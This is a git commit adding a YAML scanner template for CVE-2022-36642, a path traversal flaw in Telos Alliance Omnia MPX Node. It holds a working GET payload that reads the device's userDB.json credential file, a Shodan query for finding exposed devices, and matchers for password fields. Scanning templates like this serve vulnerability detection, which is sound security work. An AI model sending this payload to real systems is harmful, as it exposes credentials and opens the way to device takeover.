Create CVE-2022-36642.yaml

patch-1
林寒 2022-09-03 20:07:26 +08:00 committed by GitHub
parent debc17529f
commit 359402b84b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 39 additions and 0 deletions

View File

@ -0,0 +1,39 @@
id: CVE-2022-36642
info:
name: Omnia MPX 1.5.0+r1 - Path Traversal
author: For3stCo1d
severity: high
description: |
A local file disclosure vulnerability in /appConfig/userDB.json of Telos Alliance Omnia MPX Node through 1.5.0+r1 allows attackers to escalate privileges to root and execute arbitrary commands.
reference:
- https://www.exploit-db.com/exploits/50996
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36642
- https://cyber-guy.gitbook.io/cyber-guy/pocs/omnia-node-mpx-auth-bypass-via-lfd
classification:
cve-id: CVE-2022-36642
metadata:
verified: true
shodan-query: http.title:"Omnia MPX Node | Login"
tags: cve,cve2022,lfi,traversal,omnia
requests:
- method: GET
path:
- "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../../../../../config/MPXnode/www/appConfig/userDB.json"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"username":'
- '"password":'
- '"displayName":'
- '"mustChangePwd":'
- '"hasChangePwd":'
condition: and
- type: status
status:
- 200